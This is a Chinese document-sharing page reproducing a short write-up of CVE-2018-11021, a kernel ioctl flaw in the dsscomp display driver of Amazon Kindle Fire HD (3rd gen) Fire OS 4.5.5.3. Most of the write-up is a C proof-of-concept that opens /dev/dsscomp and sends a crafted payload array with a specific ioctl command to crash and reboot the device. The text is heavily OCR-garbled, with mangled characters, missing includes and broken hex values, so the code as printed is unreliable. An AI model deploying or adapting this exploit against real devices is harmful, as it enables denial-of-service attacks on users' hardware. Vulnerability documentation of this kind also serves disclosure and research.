（CVE-2018-11021）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人：lao****ou

文档编号：794859

上传时间：2024-05-25

格式：DOCX

页数：3

大小：17.48KB

《（CVE-2018-11021）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2018-11021）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx（3页珍藏版）》请在第一文库网上搜索。

1、(CVE-2018-11021)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3内核组件中的内核模块omapdriversvideoomap2dsscompdevice.c允许攻击者通过设备/dev上ioct1的参数注入特制参数/dsscomp与命令1118064517并导致内核崩溃。要探索此漏洞，必须打开设备文件/dev/dsscomp,并使用命令I118064517和精心设计的有效负载作为第三个参数在此设备文件上调用ioct1系统调用。二、漏洞影响FireOS4.5.5.3

2、三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevdsscompcausesthesystemcrashviaIOCT11118064517.* Re1atedbuggystructnameisdsscomp_setup_dispc_data.* ThisPocshou1drunwithpermissiontodoioct1ondevdsscomp.*/#inc1ude#inc1udettinc1ude#inc1udeconststaticchar*driver=,devdsscomp;s

3、taticcommand=1118064517;intmain(intargc,char*argv,char*env)unsignedintpay1oad=0xffffffff,0X00000003j05d200040,079900008j0x8f5928bd,0x78b02422j0X000000004Oxffffffff,0f4c50400,0x007fffff,0x8499f562,0ffff0400,0001b131dj060818210,0x00000007,0ffffffff,0x00000000,0x9da9041c0xcd980400,0x001f03f4,0X00000007

4、,0x2a34003f,0x7c80d8f3j0x63102627,0c73643a8,0xa28f0665,0X00000000,0x689e57b4,0x01ff0008,0x5e7324b1,0ae3b003f,00b174d86,0x00000400,0x2：Iffff37,0ceb367a4j0X00000040,0X00000001,0xec000f9e,0x00000001j0000001ff,0X00000000,000000000,0X0000000f,0x0425c069,0038cc3bej00000000f,000000080,0e5790100,0x5b1bffffj

5、0x0000d355,0x0000c685,0xa0070000,00010ffff,000a0ff00,0X00000001j0ff490700,00832ad03j000000006,000000002,0X00000001081f871c0,0738019cb,0bf47ffff,0X00000040j0X00000001,0x7f190f33,0X00000001,0x8295769b,0x0000003fj0x869f2295,Oxffffffff,0xd673914f,0x05055800,0xed69b7d5,000000000j00107ebbdj0xd214af8d,0xff

6、ff4a93j0x26450008,0x58df0000,0d16db084,003ff30ddj0x00000001,0x209aff3b,0xe7850800,0X00000002,0x30da815cj0x426f5105,0x0de109d7,02c1a65fcj0xfcb3d75f,0X00000000,000000001,08066be5b,0X00000002,0ffffffff,0x5cf232ec,0680d1469j0X00000001j0X00000020,0xffffffff,0X00000400,0xd1d12be8j0X02010200,0x01ffc16f,0xf

7、6e237e6j0x007f0000j0x0Iff08f8,0000f00f9,0bad07695,0x00000000,0xbaff0000,0x24040040j0x00000006j0X00000004,0x00000000,0bc2e9242j0009f5f08,0X00800000,0X00000000,0x00000001,0xff8800ff,0X00000001,000000000j0X000003f4,0x6faa8472j0x00000400,0xec857dd5,0x00000000j0X00000040,0ffffffff,03f004874,0x0000b77a,0e

8、c9acb95j0facc0001j0xffff0001j00080ffffj0x3600ff03,0X00000001,08fff7d7f,06b87075a,0x00000000,0x41414141j041414141j0x41414141j0x41414141,0X00100Iff,000000000j0X00000001,0xff1f0512j0x00000001,0x51e32167,0xc18c55ccj0x00000000,Oxffffffff,0xb4aaf12b86edfdbdj0x00000010,0x0000003f,0xabff7b00j0xffff9ea3j0b28

9、e0040,0000fffff,0x458603f4,0ffff007f,0a9030f02j000000001j0x002Cffff,0x9e00cdffj0x00000004j0x41414141,0x41414141,041414141,0x41414141；intfd=0;fd=OPen(driver,0_RDWR);if(fddata1oca1tmp1og);return-1;printf(Tryopen%swithcommand0x%.n,driver,command);printf(Systemwi11crashandreboot.n);if(ioct1(fd,command,pay1oad)data1oca1tmp1og);return-1;c1ose(fd);return0;)崩溃日志Tobeaddedhere

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

3 金币 0人已下载

下载	加入VIP,免费下载

版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：: 如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
特殊限制：: 部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。
关键词：: CVE-2018-11021Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11021 Amazon rd kernel 组件安全漏洞

第一文库网所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。

关于本文

本文标题：（CVE-2018-11021）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
链接地址：https://www.001doc.com/doc/794859.html